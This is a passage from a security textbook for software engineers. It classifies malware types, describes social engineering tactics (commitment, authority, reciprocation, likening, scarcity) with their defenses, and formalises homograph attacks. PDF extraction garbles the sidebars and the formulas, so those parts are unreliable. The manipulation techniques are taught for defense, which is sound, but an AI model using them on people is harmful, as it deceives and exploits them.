Duration Temporary ransomware, or adware) rather than a delivery mechanism (such as a virus,
Targeting Manual worm, or trojan). Note that “spam” andr “Spam” refers to the food, not the
Attack Immediate malware.
For a piece of e-mail to be classified as SPAM, the following conditions must be
met:
It must be a form of Though SPAM is typically e-mail, it could be in a blog, a tweet, a post on a
electronic newsgroup or a discussion board, or any other form of electronic
communication communication. Print SPAM is called junk mail.
The recipient must not have requested the message. If, for example, you have
It must be registered for a product and have failed to de-select (or opt-out) the option to
undesirable get a newsletter, then the newsletter is not SPAM. There is often a fine line
between SPAM and legitimate advertising e-mail.
60 | Chapter 03: Software Weapons | Unit 1: Attack Vectors | Security for Software Engineers
Rootkit
“Root” is the Unix term for the most privileged class of user on a system.
Type Combined
Originally, “rootkit” was a term associated with software designed to help an
Violates any
Duration Permanent unauthorized user obtain root privilege on a given system. The term has morphed
Targeting Autonomous with modern usage. Today, “rootkit” refers to any program that attempts to hide
Attack Immediate its presence from the system. A typical attack vector is to modify the system
kernel in such a way that none of the system services can detect the hidden
software. For a program to exhibit rootkit functionality, the following condition
must be met:
It must hide its The fundamental characteristic of a rootkit is that it is difficult to detect or
existence from the remove. Note that many other forms of malware could exhibit rootkit
user and/or functionality. For instance, all botware are also rootkits.
operating system
Rootkits themselves are not necessarily malicious. The owner of a system (such
as the manager of a kiosk computer in an airport terminal) may choose to install
a rootkit to ensure they remain in control of the system. More commonly, rootkits
are tools used by black hats to maintain control of a machine that was previously
cracked. The most popular rootkits of the last decade (such as NetBus and Back
Orifice 2000) are the underpinnings of modern botnet software. Rootkits as
stand-alone applications are thus somewhat rare today:
1986 Many attribute the Brain virus as the first wide-spread malware exhibiting rootkit
functionality. It infected the boot sector of the file system, thereby avoiding
detection.
1998 NetBus was developed by Carl-Fredrik Neikter to be used (claimed the author) as
a prank. It was quickly utilized by malware authors.
1999 The NTRootkit was the first to hide itself on the Windows NT kernel. It is now
detected and removed by the Windows defender Antivirus tool that comes with
the operating system.
2004 Special-purpose rootkits were installed on the Greek Vodafone telephone
exchange, allowing the intruders to monitor the calls of about 100 Greek
government and high-ranking employees.
2005 Sony-BMG included a rootkit in the release of some of their audio CDs which
included the functionality to disable MP3 ripping functionality. The rootkit was
discovered and resulted in a public relations nightmare for the company.
2010 Google Redirect virus is a rootkit that hijacks search queries from popular search
engines (not limited to Google) and sends them to malicious sites or paid
advertisers. Because it infects low-level functions in the operating system, it is
difficult to detect and remove.
Rootkits are rarely found in the wild as stand-alone programs today. Instead, they
are incorporated in more sophisticated botware.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 03: Software Weapons | 61
Spyware
Spyware is a program hiding on a computer for the purpose of monitoring the
Type any
activities of the user. In other words, spyware is a payload (like a rabbit, bomb,
Violates Confidentiality
Duration Permanent adware, ransomware, and SPAM) rather than a delivery mechanism (like a Trojan,
Targeting Autonomous Virus, or Worm). Spyware frequently has other functionality, such as re-directing
Attack Immediate web traffic or changing computer settings. Many computers today are infected
with spyware and most of the users are unaware of it.
For a program to be classified as spyware, the following conditions must be met:
It must collect user This input could include data from the keyboard, screen-shots, network
input communications, or even audio.
It must send the Some party different than the user must gather the data. This data could be in
data to a raw form directly from the user input or it may be in a highly filtered or processed
monitoring station state.
It must hide itself The user should be unaware of the presence of the data collection or transition.
from the user
Monitoring software can be high or low consent, and have positive or negative
consequences. Spyware only resides in one of these quadrants:
High Consent Low Consent
Positive Consequence Overt Provider Covert Supporter
Negative Consequence Double Agent Spyware
A brief history of spyware:
1995 First recorded use of the word “spyware” referring to an aspect of Microsoft’s
business model.
1999 The term “spyware” was used by Zone Labs to describe their personal firewall
(called Zone Alarm Personal Firewall).
1999 The game “Elf Bowling” was a popular free-ware game that circulated the early
Internet. It contained some spyware functionality sending personal information
back to the game’s creator Nsoft.
1999 Steve Gibson of Gibson Research developed the first anti-spyware: OptOut.
2012 Flame is discovered. It is a sophisticated and complex piece of malware designed
to perform cyber espionage in Middle East countries. It almost certainly was
developed by a state, making it an artifact of the third generation of hackers.
2013 Gameover ZeuS is a spyware program that notices when the user visits certain
web pages. It then steals the credentials and sends it to a master server. Modern
versions of Gameover ZeuS have been integrated into the Cutwail botnet.
62 | Chapter 03: Software Weapons | Unit 1: Attack Vectors | Security for Software Engineers
Botware
Botware (also called Zombieware or Droneware) is a program that controls a
Type Combined
system from over a network. When a computer is infected with botware, it is
Violates any
Duration Permanent called a bot (short for “robot”), zombie, or drone. Often many computers are
Targeting Autonomous controlled by botware forming botnets. Though botnets can be used for a variety
Attack Immediate of malicious purposes, a common attack vector is called a Distributed Denial of
Service (DDoS) attack where multiple bots send messages to a target system.
These attacks flood the network from many locations, serving to exclude valid
traffic and making it very difficult to stop. For a piece of malware to be classified
as botware, the following conditions must be met:
They receive orders from the owner through some remote connection. This
It must have
remote connection has evolved in recent years from simple Internet Relay Chat
remote control
(IRC) listeners to the elaborate command-and-control mechanism to today’s
facility
peer-to-peer networks.
It must implement Each Bot is capable of executing a wide variety of commands. Common examples
several commands include spyware functionality, sending SPAM, and self-propagation.
Because the value of a botnet is tied to the size of the botnet, an essential
It must hide its
characteristic of any botware is to hide its existence from the owner of the
existence
machine on which it is resident.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 03: Software Weapons | 63
SEO
Search Engine Optimization (S.E.O.) is not strictly a form of malware because it is
Type Atomic
commonly used by eCommerce websites to increase the chance a user will find
Violates Integrity
Duration Temporary their site on a search engine (Brin & Page, 1998). However, when individuals use
Targeting Autonomous questionable tactics to unfairly increase their precedence or damage those of a
Attack Immediate competitor, it qualifies as a black hat technique. For a web page to exhibit
malicious SEO characteristics, the following condition must be met:
It must inflate its The properties of the web page must make it appear more important to a web
prominence on a crawler than it actually is. This, in turn, serves to mislead search engine users into
search result thinking the page is more relevant than it is.
64 | Chapter 03: Software Weapons | Unit 1: Attack Vectors | Security for Software Engineers
Examples
1. Q Name all the types of malware that can only function with human intervention.
2. Q Name all the types of malware that are stealthy by their very nature.
3. Q Name the malware that was designed to activate a payload on May 13th, 1988.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 03: Software Weapons | 65
Exercises
1 From memory, 1) name as many types of software weapons as you can, 2)
define the malware, 3) list the properties of the malware.
4 List all the types of malware that are designed to hide their existence from the
user.
5 List all the types of malware that cannot hide their existence from the user.
66 | Chapter 03: Software Weapons | Unit 1: Attack Vectors | Security for Software Engineers
8 Categorize the following malware:
This malware spreads through e-mail channels. The user is tricked into clicking
a link which takes them to a compromised web site. When the page loads, a
buffer overrun vulnerability in the browser allows software to be installed which
sends a copy of the message to all the individuals in the user’s address book.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 03: Software Weapons | 67
Problems
1 Is a joke a virus?
2 “There are no viruses on the Macintosh platform.” Where does this perception
come from? Do you agree or disagree?
3 Identify a recent malware outbreak. Find three sources and write a “one page”
description of the malware.
5 Which type of software weapon is most common today? Find one or two
sources supporting your answer.
7 Is there a correlation between type of software weapon and type of black hat?
In other words, is it true (for example) that information warriors are most likely
to use SEO and criminals are most likely to use spyware? Find one or two sources
supporting your answer.
8 Is there a correlation between the type of software weapon and the information
assurance it targets? Describe that correlation for all the types of weapons.
68 | Chapter 03: Software Weapons | Unit 1: Attack Vectors | Security for Software Engineers
Chapter 04: Social Engineering
A critical piece of any secure system is the human actors interacting with the system. If the users can be
tricked into compromising the system, then no amount of software protection is any use. The main
objective of this lesson is to understand how people can be tricked into giving up their assets and what can
be done to prevent that from happening.
Up to this point, we have discussed how C.I.A. assurances can be provided to the
client at the upper half of the OSI model. Specifically, we have focused on
confidentiality and integrity assurances on the application, presentation, and
session layers. Social engineering is unique because it mostly occurs one level
above these; it happens at the person or user layer. Social engineering has many
definitions:
Instead of attacking a computer, social engineering is the act of interacting and
manipulating people to obtain important/sensitive information or perform an act
that is latently harmful. To be blunt, it is hacking a person instead of a computer.
(UCLA, How to Prevent Social Engineering, 2009)
This next definition is one that your grandmother would understand.
Talking your way into information that you should not have.
(Howard & Longstaff, 1998)
The following definition is interesting because it focuses on the malicious aspect.
Social engineering is a form of hacking that relies on influencing, deceiving, or
psychologically manipulating unwilling people to comply with a request.
(Kevin Mitnick, CERT Podcast Series, 2014)
Each of these definitions has the same components: using social tactics to elicit
behavior that the target individual did not intend to exhibit. These tactics can be
very powerful and effective:
Many of the most damaging security penetrations are, and will continue to be,
due to social engineering, not electronic hacking or cracking. Social engineering is
the single greatest security risk in the decade ahead.
(The Gartner Group, 2001)
Possibly Schneier put it best: “Only amateurs attack machines; professionals
target people.” The earliest written record of a social engineering attack can be
found in the 27th chapter of Genesis. Isaac, blind and well advanced in years, was
planning to give his Patriarchal blessing to his oldest son Esau. Isaac’s wife
Rebekah devised a plan to give the blessing to Jacob instead. Jacob initially
expressed doubt: “behold, my brother Esau is a hairy man, and I am a smooth
man. Perhaps my father will feel me and I shall seem to be mocking him, and bring
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 04: Social Engineering | 69
a curse upon myself and not a blessing (Genesis 27:11-12).” Rebekah dressed
Jacob in a costume consisting of Esau’s cloths and fur coverings for his arms and
neck to mimic the feel of Esau’s skin. The ruse was successful and Jacob tricked
his father into giving him the blessing.
The effectiveness of social engineering tactics was demonstrated in a recent
DefCon hacking conference. So confident where the attackers that they would be
successful that they put a handful of social engineers in a Plexiglass booth and
asked them target 135 corporate employees. Of the 135, only five were able to
resist these attacks.
From the context of computer security, the two most important aspects of social
engineering are the general methodologies involving only the interaction
between people, and the special forms of social engineering that are possible only
when technology mediates the interaction.
Attacks
Social engineering attacks are often difficult to identify because they are subtle
and varied. They all, however, relate to vulnerabilities regarding how individuals
socialize. Presented with certain social pressures, people have a tendency to be
more trusting then the situation warrants. Social engineers create social
environments to leverage these social pressures in an effort to compel individuals
to turn over assets.
Confidence men and similar social engineers have developed a wide variety of
tactics through the years that are often very creative and complex. Cialdini
identified the six fundamental techniques used in persuasion: commitment,
authority, reciprocation, reverse social engineering, likening, and scarcity.
Conveniently, this spells C.A.R.Re.L.S. (Cialdini, 2006).
Preying on people’s desire to follow through with promises, even if the promise
Commitment
was not deliberately made.
Authority Appearing to hold a higher rank or influence than one actually possesses.
Reverse Creating a problem, advertising the ability to solve the problem, and operating in
Engineering a state of heightened authority as the original problem is fixed.
70 | Chapter 04: Social Engineering | Unit 1: Attack Vectors | Security for Software Engineers
Commitment
Commitment attacks occur when the attacker tricks the victim into making a
promise which he or she will then feel obligated to keep.
Commitment Society also places great store by consistency in a person’s behavior. If we
relies on our desire promise to do something, and fail to carry out that promise, we are virtually
to be perceived certain to be considered untrustworthy or undesirable. We are therefore likely to
as trustworthy take considerable pains to act in ways that are consistent with actions that we
have taken before, even if, in the fullness of time, we later look back and
recognize that some consistencies are indeed foolish.
While commitment attacks leverage people’s desire to be seen as trustworthy,
the real vulnerability occurs because people have a tendency to not think through
the ramifications of casual promises. After all, what harm can come when you
make a polite, casual promise? This opens a window when the attacker can use
subtle social pressure to persuade the victim to honor the commitment.
Commitment attacks can be mitigated by avoiding making casual commitments
and abandoning a commitment if it is not advantageous to keep it. Remember,
an attacker will not actually be offended if a commitment is not met; in most
cases he tricked the victim into making the commitment in the first place.
A young man walks into a car dealership and asks to test drive a car. When he
returns, the salesman asks if he likes the car. The young man replies that he does
and politely describes a few things that he likes about it. A few minutes later, the
young man starts to leave the dealership. The salesman insists “… but you said
you liked the car…”
Conformity
One special type of commitment is conformity: leveraging an implied
commitment made by society rather than by the individual. People tend to avoid
social awkwardness resulting from violating social norms of niceties, patience, or
kindness. Conformity may also be related to liking, in which case it is often called
peer pressure. Conformity may refer to implicit social commitments as well as
explicit commitments. These expectations and promises may come from society,
family, coworkers, friends, religious groups, or a combination of these.
A waiter gives a customer poor service. Feeling a bit put-off, the customer decides
to give the waiter a poor tip. When it comes time to pay the bill, the waiter
pressures the customer to give the customary 15% tip by collecting the bill in
person.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 04: Social Engineering | 71
Authority
Authority is the process of an attacker assuming a role of authority which he does
not possess. It is highly effective because:
Authority People are highly likely, in the right situation, to be highly responsive to assertions
relies on our habit of authority, even when the person who purports to be in a position of authority
of respecting rank is not physically present.
(Cialdini, 2006)
Authority ploys are among the most commonly used social engineering tactics.
Three common manifestations of authority attacks are impersonation, diffusion
of responsibility, and homograph attacks.
Impersonation
Impersonation is the process of assuming the role of someone who normally
should, could, or might be given access. Attackers often adopt roles that gain
implicit trust. Such roles may include elements of innocence, investigation,
maintenance, indirect power, etc.
A bank robber is seeking more detailed information about the layout of a local
bank before his next “operation.” He needs access to parts of the building that are
normally off-limits. To do this, he wears the uniform of a security guard and walks
around the bank with an air of confidence. He even orders the employees around!
A fake e-mail designed to look like it originated from your bank is an
impersonation attack. Impersonation attacks are easy to mitigate: authenticate
the attacker. Imposters are unable to respond to authentication demands while
individuals with genuine authority can produce credentials.
Diffusion of Responsibility
A diffusion of responsibility attack involves an attacker manipulating the decision-
making process from one that is normally individual to one that is collective. The
attacker then biases the decision process of the group to his advantage. For
example, consider an attacker trying to dissuade a group of people from eating
at a restaurant. Normally this is an individual decision. The attacker first makes it
a group decision by starting a discussion with the group. Initially everyone equally
offers their opinion about the restaurant, subtlety changing the social dynamic of
the decision from an individual one to a collective one. The attacker then
becomes the leader of the discussion (which is easy because he started it) and
introduces his opinion. There now exists a social pressure for all members of the
group to avoid the restaurant even though some of the individuals may have
intended to go inside. Diffusion of responsibility works because people have a
tendency to want to share the burden and consequences of uncertain or risky
decisions. They become willing to give the leadership role to anyone willing to
take this responsibility, especially when there is a lack of a genuine authority
figure.
72 | Chapter 04: Social Engineering | Unit 1: Attack Vectors | Security for Software Engineers
Reciprocation
Reciprocation attacks occur when an attacker gives the victim a gift and the victim
feels a strong social pressure to return some type of favor. This pressure occurs
even if the gift was not requested and even if the only possible way to reciprocate
Reciprocation the gift is with one of vastly greater value.
relies on our desire
to pay back A well-recognized rule of social interaction requires that if someone gives us (or
acts of kindness promises to give us) something, we feel a strong inclination to reciprocate by
providing something in return. Even if the favor that someone offers was not
requested by the other person, the person offered the favor may feel a strong
obligation to respect the rule of reciprocation by agreeing to the favor that the
original offers or asks in return - even if that favor is significantly costlier than the
original favor.
(Cialdini, 2006)
Two strong social forces are at work in reciprocation attacks. The first is that
society strongly disapproves of those failing to repay social debts. The attacker
attempts to leverage this force by creating a social situation where the victim
would feel pressure or feel indebted to the attacker if he did not reciprocate a
gift. To mitigate this attack, the victim needs to recognize the social pressure and
consciously reject it.
The second social force at work in reciprocation attacks is gratitude. When people
receive a gift, especially an unexpected gift or a gift of high value, most feel
gratitude. A common way to express gratitude is to return a gift to the original
giver. The attacker attempts to leverage this force by creating a social situation
where the victim is to feel gratitude for the attacker so he will want to do
something for the attacker in return. Of course the most appropriate way to
handle this is to say “thank you.” However, the social engineer will create a
situation where a more convenient and perhaps more satisfying answer would be
to make an unwanted purchase or overlook an inconvenient security procedure.
To mitigate this force, the victim needs to recognize that any expression of
gratitude is appropriate, not just the one proposed by the attacker. If this
expression would result in a violation of company policy or place the victim in a
disadvantaged economic position, it must be suppressed or a different outlet
must be contemplated.
A young couple is interested in purchasing their first car together. As they drive up
to the first car dealership, a salesman greats them at their car. He is very friendly
and helpful, using none of the traditional salesman pressure tactics. After a few
minutes, the couple finds a car they like. The salesman hands them the keys and
tells them to take the car for the weekend. “The WHOLE weekend?” the wife asks?
A few days later, the couple comes to return the car. They feel a great deal of
gratitude for how kind the salesman was to them, how fun he made the car
shopping process, and for letting them put so many miles on a brand new car. If
only there was a way to say “thank you…”
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 04: Social Engineering | 73
Reverse Social Engineering
Another category of social engineering attacks is reverse social engineering, an
attack where the aggressor tricks the victim into asking him for assistance in
solving a problem. Reverse social engineering attacks occur in three stages:
Sabotage The attacker creates a problem compelling the victim to action. The problem can
be real resulting from a sabotage of a service on which the victim depends or it
could be fabricated where the victim is led to believe that assistance is required.
Advertise The next stage occurs when the attacker advertises his willingness and capacity
to solve the problem. In almost all cases, the Advertise phase requires an
Authority attack for it to work.
Assist The final phase occurs when the attacker requests assistance from the victim to
solve the problem. This assistance typically involves requests for passwords or
access to other protected resources, the target of the attack.
74 | Chapter 04: Social Engineering | Unit 1: Attack Vectors | Security for Software Engineers
Likening
Likening is the process of an attacker behaving in a way to appear similar to a
member of a trusted group. Likening attacks are often successful because people
prefer to work with people like themselves.
Likening
relies on our Our identification of a person as having characteristics identical or similar to our
tendency to trust own — places of birth, or tastes in sports, music, art, or other personal interests,
people similar to name a few — provides a strong incentive for us to adopt a mental shortcut, in
to ourselves dealing with that person, to regard him or her more favorably merely because of
that similarity.
(Cialdini, 2006)
Likening attacks are distinct from authority attacks in that the attacker is not
imitating an individual possessing rank or authority. Instead, the attacker is
attempting to appear to be a member of a group of people trusted or liked by the
victim. While authority attacks result in the victim granting the attacker privileges
associated with position or title, likening attacks result in the victim going out of
his way to aid and abet the attacker. The victim wants to do this because, if their
roles were reversed, the victim would want the same help from a friend.
Perhaps the most famous con-man who relied primarily on likening attacks was
Victor Lustiz, a French con-man who successfully sold the Eiffel Tower to a French
scrap dealer in 1923. His “Ten Commandments for Con Men” include many
likening strategies:
x Wait for the other person to reveal any political opinions, then agree with them.
x Let the other person reveal religious views, then have the same ones.
x Be a patient listener.
x Never look bored.
x Never be untidy.
x Never boast.
Likening attacks can be mitigated by the victim being suspicious of overtures of
friendship and not granting special privileges or favors to friends. This,
unfortunately, makes it difficult for an individual to be resistant to likening social
engineering attacks while at the same time being a helpful employee.
Sam is a secretary working for a large company. Just before lunch, a delivery man
comes to drop off some sensitive papers to a member of the organization.
Company policy states that only employees are allowed in the office area, but this
delivery man wants to hand-deliver the papers. As the delivery man converses
with Sam, it comes out that they grew up in the same small town and even went
to the same college. They have so much in common! Of course he will trust a fellow
Viking with something like this!
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 04: Social Engineering | 75
Scarcity
Scarcity attacks occur when the attacker is able to introduce the perception of
scarcity of an item that is of a high perceived value. This is usually effective
because:
Scarcity
relies on our desire People are highly responsive to indications that a particular item they may want
to not miss is in short supply or available for only a limited period.
an opportunity (Cialdini, 2006)
Scarcity attacks are common because they are so easy to do. It is easy for an
attacker to say that a valuable item is in short supply. It is easy for an attacker to
claim that the only time to act is now. Scarcity attacks are also easy to defeat. In
most cases, it is easy to verify if the Scarcity claim is authentic (the item really is
in short supply) or if the claim is fabricated.
Rushing
One common form of scarcity attack is rushing. Rushing involves the attacker
putting severe time constraints on a decision. Common strategies include time
limits, a sense of urgency, emergencies, impatience, limited or one-time offers,
or pretended indecision. In each case, social pressure exists to act now. Rushing
attacks are powerful because, like all scarcity attacks, they prey on people’s
inherit desire to not miss an opportunity. The more the attacker can make the
victim feel that they must act now, the more the attacker can make the desired
action appear more desirable to the victim. This attack can be mitigated by being
aware of this effect and the victim asking himself if the action would be equally
desirable without the rushing. Rushing attacks have an additional effect beyond
that of other scarcity attacks. When the victim is placed under extreme time
pressure, he is forced to make decisions differently than he normally would. This
serves to “throw him off” and makes his decision-making process less sure. This
effect can be mitigated by the victim refusing to alter his decision-making process
through artificial pressures imposed by the attacker.
Sam is on his lunch break and is passing the time by browsing the web while he
munches on his sandwich. Where should he take his family on vacation this year?
After a while, he stumbles on a very interesting resort in the Bahamas. The
pictures are fantastic! Just about to click away, a notification appears on the
screen: an all-inclusive price is now half off. Unfortunately, this offer is only good
for one hour (and a count-down timer appears on the screen).
Sam was not planning on making a commitment right now. A quick call to his wife
does not reach her. Normally he would never make such an expensive decision
without her opinion. However, because the offer is quickly expiring…!
76 | Chapter 04: Social Engineering | Unit 1: Attack Vectors | Security for Software Engineers
Defenses
The simplest and most effective defense against social engineering attacks is
education. When a target is aware of the principles of social engineering and is
aware an attack is underway, it is much more difficult to be victimized. Often,
however, a more comprehensive strategy is required. This is particularly
important where high-value assets are at risk or when the probability of an attack
is high.
Comprehensive anti-social engineering strategies are multi-layered where each
layer is designed to stop all attacks. The levels are: Training, Reaction, Inoculation,
Policy, and Physical (for T.R.I.P.P.) (Gragg, 2003).
Training
The training layer consists of educating potential victims of social engineering
attacks about the types of strategies that are likely to be used against them. This
means that every individual likely to face an attack should be well versed in how
to defend themselves, be aware of classic and current attacks, and be constantly
reminded of the risk of such attacks. They should also know that friends are not
always friends, passwords are highly personal, and uniforms are cheap. Security
awareness should be a normal, enduring aspect of employment. Education is a
critical line of defense against social engineering attacks.
Reaction
The next layer is reaction, the process of recognizing an attack and moving to a
more alert state. Perhaps a medical analogy best explains reaction. The self-
defense mechanisms built into the immune system of the human body include
the ability to recognize that an attack is underway and to increase scrutiny. This
is effective because attacks seldom occur in insolation; the existence of a single
germ in your body is a good indication other germs are present as well. An
organization should also have reaction mechanisms designed to detect an attack
and be on guard for other components of the same attack.
Reaction mechanisms consist of a multi-step process: detecting an attack is
underway, reporting or sending an alarm to alert others, and an appropriate
response.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 04: Social Engineering | 77
Detection Reaction involves early-detection. The detection system can be triggered by
individuals asking for forbidden information, rushing, name dropping, making
small mistakes, asking odd questions, or any other avoidance or deviation from
normal operations. All employees should be part of the early-detection system
and know where to report it.
Reporting Reaction also involves a central reporting system. All reports should funnel
through a single location where directions flow through the appropriate
channels. Commonly, a single person serves as the focal point for receiving and
disseminating reports.
Response Response to a social engineering attack could be as simple as an e-mail to
affected parties. However, the response can be more in-depth, such as a security
audit to determine if the attack occurred previously and was unnoticed. Updates
to training may be necessary as well as to policies that need to be revised.
Inoculation
Inoculation is the process of making attack resistance a normal part of the work
experience. This involves exposing potential victims to frequent but benign
attacks so their awareness is always high and their response to such attacks is
always well rehearsed.
The term inoculation was derived from the medical context. This process involves
exposing a patient to a weakened form of a disease. As the patient’s immune
system defeats the attack, the immune system is strengthened. This analogy is an
accurate representation of the Inoculation anti-social engineering strategy. A
penetration tester probes the defenses of a business and carefully records how
the employee reacts. Periodic inoculations can help keep employees on guard,
inform them of their weaknesses, and highlight problems in the system.
78 | Chapter 04: Social Engineering | Unit 1: Attack Vectors | Security for Software Engineers
Policy
An essential step in forming a defense is to define intrusion. Each organization
must have a comprehensive and well communicated policy with regards to
information flow and dissemination. This policy should describe what types of
actions are allowable as well as what procedures people are to follow. For a policy
to be effective, several components need to be in place:
Robust A policy must be robust and without loopholes. The assets should be completely
protected from being compromised if the policy is fully and correctly
implemented.
Known A policy needs to be communicated to all the key players. A policy that is not
known or is misunderstood has no value.
Followed A policy needs to be followed with discipline by everyone. Effective social
engineers often take advantage of weak policy implementation by creating
situations where individuals are motivated to break with the plan.
Usually, policy is expressed in terms of the 3 ‘A’s: assets, authentication
procedures, and access control mechanism:
The first ‘A’ is assets. It should be unambiguous what type of information is
private and which types of action are covered. Any ambiguity could result in an
opportunity for an attacker.
The second ‘A’ is authentication: what procedures are to be followed to
authenticate an individual requesting information? Most social engineering
attacks involve an individual attempting to deceive the victim as to their status or
role. Demanding authentication such as producing an ID or login credentials can
thwart most of these attacks.
The final ‘A’ is access control: Under what circumstances should information be
disclosed, updates be accepted, or actions taken? These should be completely
and unambiguously described. In the case where policy does not adequately
describe a given situation, there should be a well-defined fallback procedure.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 04: Social Engineering | 79
Physical
The physical social engineering defensive mechanism includes physical or logical
mechanisms designed to deny attackers access to assets. In other words, even if
the victim can be manipulated by an attacker, no information will be leaked.
For example, consider a credit card hot-line. This is clearly a target for social
engineering attacks because, if the attacker can convince the operator to release
a credit card number, then the attacker can make an unauthorized purchase. An
example of a physical mechanism would be to only accept calls from the list of
known phone numbers. This would deny outside attackers from even talking to
an operator and therefore prevent the attack from even occurring. Another
physical mechanism would be for the operator to require a username and
password before accessing any information. No matter how much the social
engineer may convince the operator that he should provide the attacker with
information, no information will be forthcoming until the required username and
password are provided.
Common physical mechanisms include:
Shredding all documents When information is destroyed, social engineers are denied access.
Just like the shredding mechanism, this would preclude any access to the
Securely wiping media
content.
Firewalls and filters These prevent attacks from reaching human eyes.
For those who are obvious targets to social engineers, minimizing access to
Least privilege valuable information. Each employee has access to only what they need to do
their job.
80 | Chapter 04: Social Engineering | Unit 1: Attack Vectors | Security for Software Engineers
Homographs
Social engineering attacks in face-to-face interactions can be difficult enough to
detect and prevent. The same attacks mediated through a computer can be
nearly impossible. This is because it can be very difficult to identify forgeries. One
special form of social engineering attack is homographs.
Homophones are two words pronounced the same but having different meanings
(e.g. “hair” and “hare”). Homonyms are two words that are spelled the same but
have different meanings (e.g. the verb “sow” and the noun “sow”). Homographs,
by contrast, are two words that visually appear the same but consist of different
characters. For example, the character 'A' is the uppercase Latin character with
the Unicode value of 0x0041. This character appears exactly the same as 'Α', the
Greek uppercase alpha with the Unicode value 0x0391. Thus the strings {0x0041,
0x000} and {0x0391, 0x000} are homographs because they both render as 'A'
(Gabrilovich & Gontmakher, 2002).
Homographs present a social engineering security problem because multiple
versions of a word could appear the same to a human observer but appear
distinct to a computer. For example, an e-mail could contain a link to a user’s
bank. On inspection, the URL could appear authentic, exactly the same as the
actual URL to the web site. However, if the 'o' in “www.bankofamerica.com” is
actually a Cyrillic 'o' (0x043e) instead of a Latin 'o' (0x006f), then a different IP
would be resolved sending the user to a different web page.
Another example of a homograph attack would be a SPAM author trying to sell a
questionable product. If the product was named “Varicomilyn,” then it would
be rather straight-forward for the SPAM-filter to search for the string. However,
if the SPAM author used a c-cedilla ('ç' or 0x00e7) instead of the 'c' or used the
number one ('1' or 0x0031) instead of 'l', then the name would escape the
SPAM filter but still be recognizable by the human reader.
The following is a slightly sanitized real e-mail containing a large number of
homographs. Clearly this e-mail was designed to evade SPAM filters.
Figure 04.1: Part of a SPAM e-mail received by author containing many homographs
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 04: Social Engineering | 81
The Problem
The underlying problem with homographs is that there are a large number of
ways to represent a similar glyph on a given platform. To illustrate this point,
consider the word “Security.” If we restrict our homographs to just the uppercase
and lowercase versions of each letter, then the variations include: “security,”
“Security,” “sEcurity,” “SecURity,” etc. The number of variations is:
numVariations = 28 = 256
Of course, there are more variations than just two for each letter. For an HTML
web page, the following exists:
International A A A These are Latin, Greek and Cyrillic. Depending on the letter, there
may be a very large number of equivalent glyphs.
LEET 0 O Short for LEET-speak, most Latin letters have 10 more variations.
Defenses
There are several parts to the homograph problem: the encoding, the rendering
function, the rendition, and the observer function (Helfrich & Neff, 2012).
Encoding
݁ଵ The encoding is how the data is represented digitally. For example, the most
common encoding of plain text is ASCII, UTF-8, and Unicode. There are many
Encoding other possible encodings for text, of course!
A representation of
Homographs do not need to be limited to plain text. They can exist in web pages
some presentation.
(where the encoding is HTML), images (encoded in JPG, PNG, GIF, or other image
formats), sound (encoded in WAV or MP3), or any other format. The homograph
scenario will specify which encoding is relevant.
The default way to compare to elements with a computer is to compare the
encodings. However, homographs exist when more than one encoding maps to a
given presentation. We represent an encoding with the lowercase .
82 | Chapter 04: Social Engineering | Unit 1: Attack Vectors | Security for Software Engineers
We represent the rendering function for a given homograph scenario with the
uppercase ሺ ሻ. Since this is a function, it takes an input (in parentheses) and
has an output. Thus ሺଵ ሻ is the process of converting an encoding ଵ into some
presentation format.
Rendition
ݎଵ A rendition is the presentation of an encoding. This is the result of the rendering
function. A string of ASCII text would map to a rendition on the screen. An HTML
Rendition
rendition would be the presentation of a web page in a browser window. An MP3
How a given encoding
rendition would be played music.
appears to the
observer. We represent a rendition with the lowercase . Thus, we can state that a
rendering function produces a rendition with: ሺଵ ሻ ՜ ଵ .
Observer Function
So how do we know if a given user will consider two renditions to be the same?
ܱሺݎଵ ǡ ݎଶ ሻ ՜ In other words, what is the probability that a given human will look at two
Observer Function renditions and not be able to tell the difference between them or consider them
The probability that the same? We capture this notion with the observer function.
a given observer The observer function takes two renditions as parameters and returns the
will consider probability that a given user will consider them the same.
two renditions the There are a few things to note about the observer function. First, it varies
same. This according to the specific user we are considering. Some users may have a very
probability is called sharp eye and notice subtle differences between renditions that would go
the threshold of unnoticed by others. Furthermore, the observer function could change according
belief. to context. A user might quickly notice when his or her bank is misspelled but
might not notice subtle differences in a URL.
There are two formats for the observer function. The first returns a probability, a
value between 0 and 1. This format is: ሺଵ ǡ ଶ ሻ ՜ . A second format returns a
Boolean value, true if two given renditions are within the threshold of belief and
false if they are not: ሺଵ ǡ ଶ ǡ ሻ.
Now that all the components are defined, we can formally specify a homograph.
Two encodings can be considered homographs of each other if a given user
considers them the same:
݁ଵ ݎଵ
ܴሺ݁ଵ ሻ
ܱሺݎଵ ǡ ݎଶ ሻ ՜
ܴሺ݁ଶ ሻ
݁ଶ ݎଶ
Figure 04.2: Relationship between encodings, renditions, and homographs
Note that there are three parts to this definition: the encodings (ଵ and ଶ ), the
rendering function (ሺሻ), and the observer function (ሺሻ). All homograph
scenarios must take these three components fully into account.
As with the observer function, the homograph function can take two forms. The
first returns the probability that two encodings will be considered the same by a
given observer: ሺଵ ǡ ଶ ሻ ՜ . This be also expressed as: ሺሺଵ ሻǡ ሺଶ ሻሻ ՜ .
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 04: Social Engineering | 83
In other words, the probability that two encodings would be considered
homographs is exactly the same as the probability that a given observer will liken
the renditions of two encodings.
The second format of the homograph function involves the threshold of belief. As
with the observer function, the homograph function will return a Boolean value:
true if two encodings are within the threshold of belief and false otherwise:
ሺଵ ǡ ଶ ǡ ሻ. This too can be expressed in terms of the observer function:
ሺଵ ǡ ଶ ǡ ሻ ൌ ሺሺଵ ሻǡ ሺଶ ሻǡ ሻ.
Security SECUrity
SECURITY seCUriTY
security security
security sEcUrItY
SeCuRiTy secuRITY
Figure 04.3: The canonicalization process
In general, the way to defeat homograph attacks is to canonicalize both the
